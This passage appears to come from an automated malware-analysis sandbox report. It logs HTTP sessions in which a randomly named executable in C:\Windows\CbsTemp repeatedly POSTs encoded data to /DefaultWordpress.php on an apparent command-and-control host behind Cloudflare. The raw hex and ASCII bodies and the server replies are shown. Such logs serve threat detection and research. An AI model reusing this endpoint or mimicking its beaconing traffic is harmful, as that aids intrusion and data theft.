                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:44.073936939 CEST | 1948 | OUT | Data Raw: 5b 5b 59 5f 5a 5f 51 56 54 5b 52 57 50 5f 57 54 50 5f 5d 5d 50 56 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[Y_Z_QVT[RWP_WTP_]]PVWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*.&("?3$0:(,), $+Z&W,'"Z3X%?#F $P.0
                                                          Oct 20, 2024 18:18:44.522319078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:44.896449089 CEST | 942 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xn9E5407jXSJQIPnTNUaGjG%2Fko1Zso8zCvlSADrK6O3gHzjD6AsIPnNIxTucARt77rniZs2OVILAGRXc%2FU%2BFKQeevbZULCWtx%2B%2FM6gZNKwNr5erLyqB1U0eqxomau%2BY5FChXxsMyNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5353ba51cf26-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13112&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=112553&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 12 27 01 23 13 28 3f 2b 0b 39 2e 31 1e 2e 5b 28 07 2e 22 3e 07 25 30 2e 15 25 2a 2d 5b 26 0d 37 5b 21 05 3e 5f 23 3f 2a 0c 3a 36 28 5e 07 12 26 13 3d 2c 20 5c 3d 5b 3c 5e 3c 28 28 5f 22 34 27 09 26 2e 2c 0a 24 2d 39 5d 3d 32 31 12 3d 03 00 56 2c 34 08 19 3a 2b 3c 5c 34 00 22 53 03 13 25 11 2b 33 2b 07 35 0b 27 11 3f 13 2b 5f 3c 28 00 5d 3f 33 3f 5d 28 28 09 1d 3b 13 3d 05 24 2f 0a 58 25 3f 20 58 26 03 33 51 27 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&'#(?+9.1.[(.">%0.%*-[&7[!>_#?*:6(^&=, \=[<^<((_"4'&.,$-9]=21=V,4:+<\4"S%+3+5'?+_<(]?3?]((;=$/X%? X&3Q':$^-/W6[O0
                                                          Oct 20, 2024 18:18:44.905917883 CEST | 286 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:45.076777935 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:45.076968908 CEST | 540 | OUT | Data Raw: 5b 5e 5c 5d 5a 5c 51 57 54 5b 52 57 50 5e 57 54 50 51 5d 5f 50 5d 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^\]Z\QWT[RWP^WTPQ]_P]W\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*=%8=W< ;089(>X>Y Y0=#22+Z$+.3*Y<#F $P.4
                                                          Oct 20, 2024 18:18:45.460500956 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMIMaEfi4HFMN7NjElczSZTs4KNcSgoz8ZASEscTRSQfaLJ7qGGIxXcx8izcA%2Ff76d37YoTagdLBS9gbx2Ci8q58QPhLT8iHPWvludxPHdThs1c8c3d%2BTvPLBr4ZGwD8IQP73bc3BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a535729abcf26-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13291&sent=8&recv=11&lost=0&retrans=0&sent_bytes=992&recv_bytes=3085&delivery_rate=204361&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:45.461051941 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----8D1LOFt4DACq1zbtAcv6ZhD79KhTHwh7CG
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3182
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:45.626738071 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:45.626910925 CEST | 3182 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 38 44 31 4c 4f 46 74 34 44 41 43 71 31 7a 62 74 41 63 76 36 5a 68 44 37 39 4b 68 54 48 77 68 37 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------8D1LOFt4DACq1zbtAcv6ZhD79KhTHwh7CGContent-Disposition: form-data; name="0"Content-Type: text/plain^ZYY_ZQQT[RWP^WRPX]YPWWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:46.030092955 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HPgCNAJbYIXXkKlNqaxzcHoBTj9EPEntCPAxEuyO0ZTGIgUsBj40bUk2GBB1fRr8yxP0SPSbsarRAMc1oMjnPFwMsCjzjIk3sqk9XQyo293P02f%2F%2B%2FwTeFKH0Xvuug29d7GB6INvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a535aa99fcf26-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13169&sent=14&recv=18&lost=0&retrans=0&sent_bytes=1804&recv_bytes=6589&delivery_rate=223267&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          39 | 192.168.2.5 | 49980 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:43.998157978 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:44.354509115 CEST | 2520 | OUT | Data Raw: 5b 5b 5c 52 5a 59 54 51 54 5b 52 57 50 5a 57 55 50 59 5d 5e 50 51 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\RZYTQT[RWPZWUPY]^PQW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*Y&]:<3\0:<.](<4'?$"3['20_?:#F $P.
                                                          Oct 20, 2024 18:18:44.777638912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:45.154947042 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGbfdapN8JDn4WugG6fNK6j9Yp8oPUzbFE6yQoefR%2BrQ5IUg3r24SOHwIADv2XB4xZuIKdvAPeNsoOTWmF7uypGFXYnjGxe4csXh%2Fq4PsPYxChhA74XDBpn3FtG5pAkc86VijE7WAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53555875642f-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11131&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=127734&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          40 | 192.168.2.5 | 49986 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:45.287992001 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:45.635282040 CEST | 2528 | OUT | Data Raw: 5b 51 5c 5f 5a 5c 51 55 54 5b 52 57 50 5e 57 51 50 5d 5d 59 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\_Z\QUT[RWP^WQP]]YPVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _)%_2!U(3'Z&(1<+><;'-3X2$'+.[0.&Y?#F $P.4
                                                          Oct 20, 2024 18:18:46.116389036 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:46.491411924 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvT1kg0%2BkmOPZTaaOCb7zm6nM9ns3sbCwwlxsKEICCh8QBIkw9PtGsrsniqApsbpm9zirQTNiJStvAl5lrbfOuvPtBYyGZJVrYZ7ujFYTBJ6Yep0fJKLuFhHvAC%2Brh7vYKU4v32UvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a535db99dd01d-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13081&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112030&cwnd=47&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          41 | 192.168.2.5 | 49992 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:46.823216915 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:47.182265043 CEST | 2528 | OUT | Data Raw: 5b 5c 59 5b 5f 5a 54 50 54 5b 52 57 50 5c 57 51 50 5b 5d 5e 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [\Y[_ZTPT[RWP\WQP[]^PVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#*#$8%W(0 &(?X+(/0$&7_'(%>9):#F $P.<
                                                          Oct 20, 2024 18:18:47.616969109 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:47.843867064 CEST | 786 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJG1luQ7kZVzC%2FHqNHnI0YgENev0%2FzJmWdeuj3XtAzmi7f1qFAtgxdD1gQ6GkiJg6MmacrY1zsBy1lAawceqQ8Zf5HrpTFXKAMhV41l0hv7jGgY7D0wryutq9hFkX68SpGLaDIu3Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5367187f176b-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11382&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=130110&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          42 | 192.168.2.5 | 49997 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:47.966804981 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Oct 20, 2024 18:18:48.322748899 CEST | 2528 | OUT | (request body)
Oct 20, 2024 18:18:48.769073009 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:49.146791935 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BBwGK4xgohWaXCWwsiOdU3K1bJe0Lni25kQka%2B1ekqvlzXHmLwdsZyharMllQdpMIeEDef94QNi04jZHAorO9b%2Bv6bkjhNDN0rRlL7NpXvlUI5HpgLfdyhM8P1%2FEbU2zdccVUQuPmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a536e488a1643-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12720&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=125324&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50004 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 20, 2024 18:18:49.465164900 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Oct 20, 2024 18:18:49.822726011 CEST | 2528 | OUT | (request body)
Oct 20, 2024 18:18:50.257834911 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:50.484092951 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0w9exsXsO0EFzG66f2ncR9HNVfYesQ8aPjtDbcXNKO74dK82Q%2ByUOy6ixWvz0%2FVTGGlnKN%2FL5YvErWhtTK1SXFKihESKhroo2hUybuJIqKY2HcO%2BgvZDaxItZTyM0lvlKsT8I%2FlVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53779f86fabe-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11660&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=124537&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50008 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 20, 2024 18:18:49.907429934 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1924
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Oct 20, 2024 18:18:50.260162115 CEST | 1924 | OUT | (request body)
Oct 20, 2024 18:18:50.708472967 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:50.924787045 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:51.069937944 CEST | 936 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HXFV8HXRE3cNuM%2Btw6r3k16H3zOOA4xKwUCRN8OCttFmngNlqRQrWbACY2puhSMFRaD2dRYajjfIwNtA5epwbh7SM21%2FN27%2BkEHRX7auFCWcGh8uXNQvJSryEO0K9Wx6G4ZKuLbU9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a537a6d121598-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11030&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2235&delivery_rate=131888&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50010 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 20, 2024 18:18:50.614252090 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Oct 20, 2024 18:18:50.963315010 CEST | 2528 | OUT | (request body)
Oct 20, 2024 18:18:53.389523029 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:53.625449896 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YeDPQ5mw%2Btre4qZt2ua8nkSIn6jGE653R0Bkh0%2FSyTyLumgBuHBBpQGX7CYB2C1wt4N1L4zYjFVbKKUqUFFiaQFmZWTnPEn7oUNeWbtghADxmUiXiUcG3Gb7zs7jOP%2FShtiQvI4Asg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a538b2e4a26b0-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11308&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=121977&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50024 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 20, 2024 18:18:53.754448891 CEST | 286 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
Oct 20, 2024 18:18:54.104036093 CEST | 540 | OUT | (request body)
Oct 20, 2024 18:18:54.524266958 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 20, 2024 18:18:55.038105011 CEST | 788 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wKyckXbeNNjMHA5PICqXEJGndFHqg001vlmbhL1o2r20HmaZSl1E20R%2FoF%2Fg1UPhXYAslJ02vj%2BCRwduoHIh7NNqza%2Fbc3ml1Jqtq1Xb0yNnvdVJ7xCPasBDQ6UeaxFoPtxdFZUSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53923ea0faf8-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12968&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=826&delivery_rate=110745&cwnd=48&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 20, 2024 18:18:55.116760015 CEST | 788 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wKyckXbeNNjMHA5PICqXEJGndFHqg001vlmbhL1o2r20HmaZSl1E20R%2FoF%2Fg1UPhXYAslJ02vj%2BCRwduoHIh7NNqza%2Fbc3ml1Jqtq1Xb0yNnvdVJ7xCPasBDQ6UeaxFoPtxdFZUSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53923ea0faf8-SJC
                                                          alt-svc: h3=":443"; ma=86400
